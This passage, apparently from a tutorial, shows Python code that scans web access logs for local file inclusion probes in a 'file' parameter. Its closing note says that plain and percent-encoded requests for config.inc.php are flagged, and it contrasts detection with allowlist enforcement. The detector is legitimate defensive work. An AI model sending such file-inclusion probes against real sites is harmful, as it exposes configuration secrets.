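    """Return (ip, path, {param: [values]}) for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return m.group("ip"), parts.path, parse_qs(parts.query, keep_blank_values=True)


def find_lfi_attempts(lines):
    """Scan log lines and report every `file` value that looks like an LFI probe."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        for value in params.get("file", []):
            if is_lfi_attempt(value):
                hits.append((ip, path, value))
    return hits


if __name__ == "__main__":
    for ip, path, value in find_lfi_attempts(SAMPLE_ACCESS_LOG):
        print(f"LFI probe from {ip} on {path}: file={value}")
```

Two of the six constructed lines are reported (the plain and the percent-encoded request for config.inc.php), while file=c.php is not: it is not an attack pattern, but it is still refused by `safe_include_target` because only names on the allowlist may be included. That split between "looks like an attack" (detection) and "is permitted" (enforcement) is the point of keeping the two functions separate.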